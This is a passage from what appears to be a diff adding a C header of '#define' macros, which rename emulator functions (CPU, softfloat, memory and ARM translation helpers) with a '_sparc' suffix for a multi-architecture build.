cp_reg_reset_sparc +#define cpreg_to_kvm_id cpreg_to_kvm_id_sparc +#define cpsr_read cpsr_read_sparc +#define cpsr_write cpsr_write_sparc +#define cptype_valid cptype_valid_sparc +#define cpu_abort cpu_abort_sparc +#define cpu_arm_exec cpu_arm_exec_sparc +#define cpu_arm_gen_code cpu_arm_gen_code_sparc +#define cpu_arm_init cpu_arm_init_sparc +#define cpu_breakpoint_insert cpu_breakpoint_insert_sparc +#define cpu_breakpoint_remove cpu_breakpoint_remove_sparc +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc +#define cpu_can_do_io cpu_can_do_io_sparc +#define cpu_can_run cpu_can_run_sparc +#define cpu_class_init cpu_class_init_sparc +#define cpu_common_class_by_name cpu_common_class_by_name_sparc +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_sparc +#define cpu_common_get_arch_id cpu_common_get_arch_id_sparc +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_sparc +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_sparc +#define cpu_common_has_work cpu_common_has_work_sparc +#define cpu_common_initfn cpu_common_initfn_sparc +#define cpu_common_noop cpu_common_noop_sparc +#define cpu_common_parse_features cpu_common_parse_features_sparc +#define cpu_common_realizefn cpu_common_realizefn_sparc +#define cpu_common_reset cpu_common_reset_sparc +#define cpu_dump_statistics cpu_dump_statistics_sparc +#define cpu_exec_init cpu_exec_init_sparc +#define cpu_flush_icache_range cpu_flush_icache_range_sparc +#define cpu_gen_init cpu_gen_init_sparc +#define cpu_get_clock cpu_get_clock_sparc +#define cpu_get_real_ticks cpu_get_real_ticks_sparc +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_sparc +#define cpu_handle_debug_exception cpu_handle_debug_exception_sparc +#define cpu_handle_guest_debug cpu_handle_guest_debug_sparc +#define cpu_inb cpu_inb_sparc +#define cpu_inl cpu_inl_sparc +#define cpu_interrupt cpu_interrupt_sparc +#define 
cpu_interrupt_handler cpu_interrupt_handler_sparc +#define cpu_inw cpu_inw_sparc +#define cpu_io_recompile cpu_io_recompile_sparc +#define cpu_is_stopped cpu_is_stopped_sparc +#define cpu_ldl_code cpu_ldl_code_sparc +#define cpu_ldub_code cpu_ldub_code_sparc +#define cpu_lduw_code cpu_lduw_code_sparc +#define cpu_memory_rw_debug cpu_memory_rw_debug_sparc +#define cpu_mmu_index cpu_mmu_index_sparc +#define cpu_outb cpu_outb_sparc +#define cpu_outl cpu_outl_sparc +#define cpu_outw cpu_outw_sparc +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_sparc +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_sparc +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_sparc +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_sparc +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_sparc +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc +#define cpu_physical_memory_map cpu_physical_memory_map_sparc +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_sparc +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_sparc +#define cpu_physical_memory_rw cpu_physical_memory_rw_sparc +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_sparc +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_sparc +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_sparc +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_sparc +#define cpu_register cpu_register_sparc +#define cpu_register_types cpu_register_types_sparc +#define cpu_restore_state cpu_restore_state_sparc +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_sparc +#define cpu_single_step cpu_single_step_sparc +#define cpu_tb_exec cpu_tb_exec_sparc +#define 
cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_sparc +#define cpu_to_be64 cpu_to_be64_sparc +#define cpu_to_le32 cpu_to_le32_sparc +#define cpu_to_le64 cpu_to_le64_sparc +#define cpu_type_info cpu_type_info_sparc +#define cpu_unassigned_access cpu_unassigned_access_sparc +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc +#define cpu_watchpoint_insert cpu_watchpoint_insert_sparc +#define cpu_watchpoint_remove cpu_watchpoint_remove_sparc +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc +#define crc32c_table crc32c_table_sparc +#define create_new_memory_mapping create_new_memory_mapping_sparc +#define csselr_write csselr_write_sparc +#define cto32 cto32_sparc +#define ctr_el0_access ctr_el0_access_sparc +#define ctz32 ctz32_sparc +#define ctz64 ctz64_sparc +#define dacr_write dacr_write_sparc +#define dbgbcr_write dbgbcr_write_sparc +#define dbgbvr_write dbgbvr_write_sparc +#define dbgwcr_write dbgwcr_write_sparc +#define dbgwvr_write dbgwvr_write_sparc +#define debug_cp_reginfo debug_cp_reginfo_sparc +#define debug_frame debug_frame_sparc +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_sparc +#define define_arm_cp_regs define_arm_cp_regs_sparc +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_sparc +#define define_debug_regs define_debug_regs_sparc +#define define_one_arm_cp_reg define_one_arm_cp_reg_sparc +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_sparc +#define deposit32 deposit32_sparc +#define deposit64 deposit64_sparc +#define deregister_tm_clones deregister_tm_clones_sparc +#define device_class_base_init device_class_base_init_sparc +#define device_class_init device_class_init_sparc +#define device_finalize device_finalize_sparc +#define device_get_realized device_get_realized_sparc +#define device_initfn device_initfn_sparc +#define device_post_init device_post_init_sparc +#define 
device_reset device_reset_sparc +#define device_set_realized device_set_realized_sparc +#define device_type_info device_type_info_sparc +#define disas_arm_insn disas_arm_insn_sparc +#define disas_coproc_insn disas_coproc_insn_sparc +#define disas_dsp_insn disas_dsp_insn_sparc +#define disas_iwmmxt_insn disas_iwmmxt_insn_sparc +#define disas_neon_data_insn disas_neon_data_insn_sparc +#define disas_neon_ls_insn disas_neon_ls_insn_sparc +#define disas_thumb2_insn disas_thumb2_insn_sparc +#define disas_thumb_insn disas_thumb_insn_sparc +#define disas_vfp_insn disas_vfp_insn_sparc +#define disas_vfp_v8_insn disas_vfp_v8_insn_sparc +#define do_arm_semihosting do_arm_semihosting_sparc +#define do_clz16 do_clz16_sparc +#define do_clz8 do_clz8_sparc +#define do_constant_folding do_constant_folding_sparc +#define do_constant_folding_2 do_constant_folding_2_sparc +#define do_constant_folding_cond do_constant_folding_cond_sparc +#define do_constant_folding_cond2 do_constant_folding_cond2_sparc +#define do_constant_folding_cond_32 do_constant_folding_cond_32_sparc +#define do_constant_folding_cond_64 do_constant_folding_cond_64_sparc +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_sparc +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_sparc +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_sparc +#define do_ssat do_ssat_sparc +#define do_usad do_usad_sparc +#define do_usat do_usat_sparc +#define do_v7m_exception_exit do_v7m_exception_exit_sparc +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_sparc +#define dummy_func dummy_func_sparc +#define dummy_section dummy_section_sparc +#define _DYNAMIC _DYNAMIC_sparc +#define _edata _edata_sparc +#define _end _end_sparc +#define end_list end_list_sparc +#define eq128 eq128_sparc +#define ErrorClass_lookup ErrorClass_lookup_sparc +#define error_copy error_copy_sparc +#define error_exit error_exit_sparc +#define error_get_class error_get_class_sparc +#define error_get_pretty error_get_pretty_sparc +#define 
error_setg_file_open error_setg_file_open_sparc +#define estimateDiv128To64 estimateDiv128To64_sparc +#define estimateSqrt32 estimateSqrt32_sparc +#define excnames excnames_sparc +#define excp_is_internal excp_is_internal_sparc +#define extended_addresses_enabled extended_addresses_enabled_sparc +#define extended_mpu_ap_bits extended_mpu_ap_bits_sparc +#define extract32 extract32_sparc +#define extract64 extract64_sparc +#define extractFloat128Exp extractFloat128Exp_sparc +#define extractFloat128Frac0 extractFloat128Frac0_sparc +#define extractFloat128Frac1 extractFloat128Frac1_sparc +#define extractFloat128Sign extractFloat128Sign_sparc +#define extractFloat16Exp extractFloat16Exp_sparc +#define extractFloat16Frac extractFloat16Frac_sparc +#define extractFloat16Sign extractFloat16Sign_sparc +#define extractFloat32Exp extractFloat32Exp_sparc +#define extractFloat32Frac extractFloat32Frac_sparc +#define extractFloat32Sign extractFloat32Sign_sparc +#define extractFloat64Exp extractFloat64Exp_sparc +#define extractFloat64Frac extractFloat64Frac_sparc +#define extractFloat64Sign extractFloat64Sign_sparc +#define extractFloatx80Exp extractFloatx80Exp_sparc +#define extractFloatx80Frac extractFloatx80Frac_sparc +#define extractFloatx80Sign extractFloatx80Sign_sparc +#define fcse_write fcse_write_sparc +#define find_better_copy find_better_copy_sparc +#define find_default_machine find_default_machine_sparc +#define find_desc_by_name find_desc_by_name_sparc +#define find_first_bit find_first_bit_sparc +#define find_paging_enabled_cpu find_paging_enabled_cpu_sparc +#define find_ram_block find_ram_block_sparc +#define find_ram_offset find_ram_offset_sparc +#define find_string find_string_sparc +#define find_type find_type_sparc +#define _fini _fini_sparc +#define flatrange_equal flatrange_equal_sparc +#define flatview_destroy flatview_destroy_sparc +#define flatview_init flatview_init_sparc +#define flatview_insert flatview_insert_sparc +#define flatview_lookup 
flatview_lookup_sparc +#define flatview_ref flatview_ref_sparc +#define flatview_simplify flatview_simplify_sparc +#define flatview_unref flatview_unref_sparc +#define float128_add float128_add_sparc +#define float128_compare float128_compare_sparc +#define float128_compare_internal float128_compare_internal_sparc +#define float128_compare_quiet float128_compare_quiet_sparc +#define float128_default_nan float128_default_nan_sparc +#define float128_div float128_div_sparc +#define float128_eq float128_eq_sparc +#define float128_eq_quiet float128_eq_quiet_sparc +#define float128_is_quiet_nan float128_is_quiet_nan_sparc +#define float128_is_signaling_nan float128_is_signaling_nan_sparc +#define float128_le float128_le_sparc +#define float128_le_quiet float128_le_quiet_sparc +#define float128_lt float128_lt_sparc +#define float128_lt_quiet float128_lt_quiet_sparc +#define float128_maybe_silence_nan float128_maybe_silence_nan_sparc +#define float128_mul float128_mul_sparc +#define float128_rem float128_rem_sparc +#define float128_round_to_int float128_round_to_int_sparc +#define float128_scalbn float128_scalbn_sparc +#define float128_sqrt float128_sqrt_sparc +#define float128_sub float128_sub_sparc +#define float128ToCommonNaN float128ToCommonNaN_sparc +#define float128_to_float32 float128_to_float32_sparc +#define float128_to_float64 float128_to_float64_sparc +#define float128_to_floatx80 float128_to_floatx80_sparc +#define float128_to_int32 float128_to_int32_sparc +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc +#define float128_to_int64 float128_to_int64_sparc +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc +#define float128_unordered float128_unordered_sparc +#define float128_unordered_quiet float128_unordered_quiet_sparc +#define float16_default_nan float16_default_nan_sparc +#define float16_is_quiet_nan float16_is_quiet_nan_sparc +#define float16_is_signaling_nan float16_is_signaling_nan_sparc +#define 
float16_maybe_silence_nan float16_maybe_silence_nan_sparc +#define float16ToCommonNaN float16ToCommonNaN_sparc +#define float16_to_float32 float16_to_float32_sparc +#define float16_to_float64 float16_to_float64_sparc +#define float32_abs float32_abs_sparc +#define float32_add float32_add_sparc +#define float32_chs float32_chs_sparc +#define float32_compare float32_compare_sparc +#define float32_compare_internal float32_compare_internal_sparc +#define float32_compare_quiet float32_compare_quiet_sparc +#define float32_default_nan float32_default_nan_sparc +#define float32_div float32_div_sparc +#define float32_eq float32_eq_sparc +#define float32_eq_quiet float32_eq_quiet_sparc +#define float32_exp2 float32_exp2_sparc +#define float32_exp2_coefficients float32_exp2_coefficients_sparc +#define float32_is_any_nan float32_is_any_nan_sparc +#define float32_is_infinity float32_is_infinity_sparc +#define float32_is_neg float32_is_neg_sparc +#define float32_is_quiet_nan float32_is_quiet_nan_sparc +#define float32_is_signaling_nan float32_is_signaling_nan_sparc +#define float32_is_zero float32_is_zero_sparc +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_sparc +#define float32_le float32_le_sparc +#define float32_le_quiet float32_le_quiet_sparc +#define float32_log2 float32_log2_sparc +#define float32_lt float32_lt_sparc +#define float32_lt_quiet float32_lt_quiet_sparc +#define float32_max float32_max_sparc +#define float32_maxnum float32_maxnum_sparc +#define float32_maxnummag float32_maxnummag_sparc +#define float32_maybe_silence_nan float32_maybe_silence_nan_sparc +#define float32_min float32_min_sparc +#define float32_minmax float32_minmax_sparc +#define float32_minnum float32_minnum_sparc +#define float32_minnummag float32_minnummag_sparc +#define float32_mul float32_mul_sparc +#define float32_muladd float32_muladd_sparc +#define float32_rem float32_rem_sparc +#define float32_round_to_int float32_round_to_int_sparc +#define float32_scalbn 
float32_scalbn_sparc +#define float32_set_sign float32_set_sign_sparc +#define float32_sqrt float32_sqrt_sparc +#define float32_squash_input_denormal float32_squash_input_denormal_sparc +#define float32_sub float32_sub_sparc +#define float32ToCommonNaN float32ToCommonNaN_sparc +#define float32_to_float128 float32_to_float128_sparc +#define float32_to_float16 float32_to_float16_sparc +#define float32_to_float64 float32_to_float64_sparc +#define float32_to_floatx80 float32_to_floatx80_sparc +#define float32_to_int16 float32_to_int16_sparc +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc +#define float32_to_int32 float32_to_int32_sparc +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc +#define float32_to_int64 float32_to_int64_sparc +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc +#define float32_to_uint16 float32_to_uint16_sparc +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc +#define float32_to_uint32 float32_to_uint32_sparc +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc +#define float32_to_uint64 float32_to_uint64_sparc +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc +#define float32_unordered float32_unordered_sparc +#define float32_unordered_quiet float32_unordered_quiet_sparc +#define float64_abs float64_abs_sparc +#define float64_add float64_add_sparc +#define float64_chs float64_chs_sparc +#define float64_compare float64_compare_sparc +#define float64_compare_internal float64_compare_internal_sparc +#define float64_compare_quiet float64_compare_quiet_sparc +#define float64_default_nan float64_default_nan_sparc +#define float64_div float64_div_sparc +#define float64_eq float64_eq_sparc +#define float64_eq_quiet float64_eq_quiet_sparc +#define float64_is_any_nan float64_is_any_nan_sparc +#define float64_is_infinity float64_is_infinity_sparc +#define float64_is_neg float64_is_neg_sparc 
+#define float64_is_quiet_nan float64_is_quiet_nan_sparc +#define float64_is_signaling_nan float64_is_signaling_nan_sparc +#define float64_is_zero float64_is_zero_sparc +#define float64_le float64_le_sparc +#define float64_le_quiet float64_le_quiet_sparc +#define float64_log2 float64_log2_sparc +#define float64_lt float64_lt_sparc +#define float64_lt_quiet float64_lt_quiet_sparc +#define float64_max float64_max_sparc +#define float64_maxnum float64_maxnum_sparc +#define float64_maxnummag float64_maxnummag_sparc +#define float64_maybe_silence_nan float64_maybe_silence_nan_sparc +#define float64_min float64_min_sparc +#define float64_minmax float64_minmax_sparc +#define float64_minnum float64_minnum_sparc +#define float64_minnummag float64_minnummag_sparc +#define float64_mul float64_mul_sparc +#define float64_muladd float64_muladd_sparc +#define float64_rem float64_rem_sparc +#define float64_round_to_int float64_round_to_int_sparc +#define float64_scalbn float64_scalbn_sparc +#define float64_set_sign float64_set_sign_sparc +#define float64_sqrt float64_sqrt_sparc +#define float64_squash_input_denormal float64_squash_input_denormal_sparc +#define float64_sub float64_sub_sparc +#define float64ToCommonNaN float64ToCommonNaN_sparc +#define float64_to_float128 float64_to_float128_sparc +#define float64_to_float16 float64_to_float16_sparc +#define float64_to_float32 float64_to_float32_sparc +#define float64_to_floatx80 float64_to_floatx80_sparc +#define float64_to_int16 float64_to_int16_sparc +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc +#define float64_to_int32 float64_to_int32_sparc +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc +#define float64_to_int64 float64_to_int64_sparc +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc +#define float64_to_uint16 float64_to_uint16_sparc +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc +#define float64_to_uint32 
float64_to_uint32_sparc +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc +#define float64_to_uint64 float64_to_uint64_sparc +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc +#define float64_trunc_to_int float64_trunc_to_int_sparc +#define float64_unordered float64_unordered_sparc +#define float64_unordered_quiet float64_unordered_quiet_sparc +#define float_raise float_raise_sparc +#define floatx80_add floatx80_add_sparc +#define floatx80_compare floatx80_compare_sparc +#define floatx80_compare_internal floatx80_compare_internal_sparc +#define floatx80_compare_quiet floatx80_compare_quiet_sparc +#define floatx80_default_nan floatx80_default_nan_sparc +#define floatx80_div floatx80_div_sparc +#define floatx80_eq floatx80_eq_sparc +#define floatx80_eq_quiet floatx80_eq_quiet_sparc +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc +#define floatx80_le floatx80_le_sparc +#define floatx80_le_quiet floatx80_le_quiet_sparc +#define floatx80_lt floatx80_lt_sparc +#define floatx80_lt_quiet floatx80_lt_quiet_sparc +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_sparc +#define floatx80_mul floatx80_mul_sparc +#define floatx80_rem floatx80_rem_sparc +#define floatx80_round_to_int floatx80_round_to_int_sparc +#define floatx80_scalbn floatx80_scalbn_sparc +#define floatx80_sqrt floatx80_sqrt_sparc +#define floatx80_sub floatx80_sub_sparc +#define floatx80ToCommonNaN floatx80ToCommonNaN_sparc +#define floatx80_to_float128 floatx80_to_float128_sparc +#define floatx80_to_float32 floatx80_to_float32_sparc +#define floatx80_to_float64 floatx80_to_float64_sparc +#define floatx80_to_int32 floatx80_to_int32_sparc +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc +#define floatx80_to_int64 floatx80_to_int64_sparc +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc +#define 
floatx80_unordered floatx80_unordered_sparc +#define floatx80_unordered_quiet floatx80_unordered_quiet_sparc +#define flush_icache_range flush_icache_range_sparc +#define format_string format_string_sparc +#define fp_decode_rm fp_decode_rm_sparc +#define frame_dummy frame_dummy_sparc +#define free_range free_range_sparc +#define fstat64 fstat64_sparc +#define futex_wait futex_wait_sparc +#define futex_wake futex_wake_sparc +#define gen_aa32_ld16s gen_aa32_ld16s_sparc +#define gen_aa32_ld16u gen_aa32_ld16u_sparc +#define gen_aa32_ld32u gen_aa32_ld32u_sparc +#define gen_aa32_ld64 gen_aa32_ld64_sparc +#define gen_aa32_ld8s gen_aa32_ld8s_sparc +#define gen_aa32_ld8u gen_aa32_ld8u_sparc +#define gen_aa32_st16 gen_aa32_st16_sparc +#define gen_aa32_st32 gen_aa32_st32_sparc +#define gen_aa32_st64 gen_aa32_st64_sparc +#define gen_aa32_st8 gen_aa32_st8_sparc +#define gen_adc gen_adc_sparc +#define gen_adc_CC gen_adc_CC_sparc +#define gen_add16 gen_add16_sparc +#define gen_add_carry gen_add_carry_sparc +#define gen_add_CC gen_add_CC_sparc +#define gen_add_datah_offset gen_add_datah_offset_sparc +#define gen_add_data_offset gen_add_data_offset_sparc +#define gen_addq gen_addq_sparc +#define gen_addq_lo gen_addq_lo_sparc +#define gen_addq_msw gen_addq_msw_sparc +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_sparc +#define gen_arm_shift_im gen_arm_shift_im_sparc +#define gen_arm_shift_reg gen_arm_shift_reg_sparc +#define gen_bx gen_bx_sparc +#define gen_bx_im gen_bx_im_sparc +#define gen_clrex gen_clrex_sparc +#define generate_memory_topology generate_memory_topology_sparc +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_sparc +#define gen_exception gen_exception_sparc +#define gen_exception_insn gen_exception_insn_sparc +#define gen_exception_internal gen_exception_internal_sparc +#define gen_exception_internal_insn gen_exception_internal_insn_sparc +#define gen_exception_return gen_exception_return_sparc +#define gen_goto_tb gen_goto_tb_sparc +#define 
gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_sparc +#define gen_helper_add_saturate gen_helper_add_saturate_sparc +#define gen_helper_add_setq gen_helper_add_setq_sparc +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_sparc +#define gen_helper_clz32 gen_helper_clz32_sparc +#define gen_helper_clz64 gen_helper_clz64_sparc +#define gen_helper_clz_arm gen_helper_clz_arm_sparc +#define gen_helper_cpsr_read gen_helper_cpsr_read_sparc +#define gen_helper_cpsr_write gen_helper_cpsr_write_sparc +#define gen_helper_crc32_arm gen_helper_crc32_arm_sparc +#define gen_helper_crc32c gen_helper_crc32c_sparc +#define gen_helper_crypto_aese gen_helper_crypto_aese_sparc +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_sparc +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_sparc +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_sparc +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_sparc +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_sparc +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_sparc +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_sparc +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_sparc +#define gen_helper_double_saturate gen_helper_double_saturate_sparc +#define gen_helper_exception_internal gen_helper_exception_internal_sparc +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_sparc +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_sparc +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_sparc +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_sparc +#define gen_helper_get_user_reg gen_helper_get_user_reg_sparc +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_sparc +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_sparc +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_sparc +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_sparc +#define gen_helper_iwmmxt_addnl 
gen_helper_iwmmxt_addnl_sparc +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_sparc +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_sparc +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_sparc +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_sparc +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_sparc +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_sparc +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_sparc +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_sparc +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_sparc +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_sparc +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_sparc +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_sparc +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_sparc +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_sparc +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_sparc +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_sparc +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_sparc +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_sparc +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_sparc +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_sparc +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_sparc +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_sparc +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_sparc +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_sparc +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_sparc +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_sparc +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_sparc +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_sparc +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_sparc +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_sparc +#define gen_helper_iwmmxt_maxsl 
gen_helper_iwmmxt_maxsl_sparc +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_sparc +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_sparc +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_sparc +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_sparc +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_sparc +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_sparc +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_sparc +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_sparc +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_sparc +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_sparc +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_sparc +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_sparc +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_sparc +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_sparc +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_sparc +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_sparc +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_sparc +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_sparc +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_sparc +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_sparc +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_sparc +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_sparc +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_sparc +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_sparc +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_sparc +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_sparc +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_sparc +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_sparc +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_sparc +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_sparc +#define gen_helper_iwmmxt_sadw 
gen_helper_iwmmxt_sadw_sparc +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_sparc +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_sparc +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_sparc +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_sparc +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_sparc +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_sparc +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_sparc +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_sparc +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_sparc +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_sparc +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_sparc +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_sparc +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_sparc +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_sparc +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_sparc +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_sparc +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_sparc +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_sparc +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_sparc +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_sparc +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_sparc +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_sparc +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_sparc +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_sparc +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_sparc +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_sparc +#define 